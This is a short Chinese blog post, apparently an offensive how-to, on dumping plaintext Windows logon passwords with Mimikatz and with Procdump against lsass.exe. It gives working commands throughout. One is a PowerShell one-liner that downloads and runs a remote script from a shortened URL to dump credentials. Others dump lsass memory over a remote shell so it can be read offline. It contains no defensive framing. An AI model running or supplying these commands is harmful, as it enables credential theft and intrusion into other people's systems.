使用prodump导出lsass读取win系统明文密码


1.Mimikatz

作者的博客https://blog.gentilkiwi.com/mimikatz     

直达下载地址https://github.com/gentilkiwi/mimikatz


一个通过系统调试,可以直接抓取系统内明文密码的程序。


只能本地权限运行,方法:


第一条:privilege::debug //提升权限
第二条:sekurlsa::logonpasswords  //获取密码



powershell调用mimikatz提取密码:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"


2.prodump

       因为mimikatz一般都是登录的远程服务器本地运行。当我们只有shell,而shell又足够大,没有登录3389的需求时,可以使用微软的prodump导出lsass.exe进程,下载回来然后本地导入mimikatz获取明文密码。


NT5以上使用微软的Procdump工具


Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx


操作命令:

Procdump.exe -accepteula -ma lsass.exe lsass.dmp



之后我们就可以得到远程机器的明文密码了。命令如下:

>>mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
Switch to MINIDUMP

>>mimikatz # sekurlsa::logonPasswords full


本博客所有文章如无特别注明均为原创。作者:R3m1x ,复制或转载请注明转自原文地址《使用prodump导出lsass读取win系统明文密码
分享到:更多

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)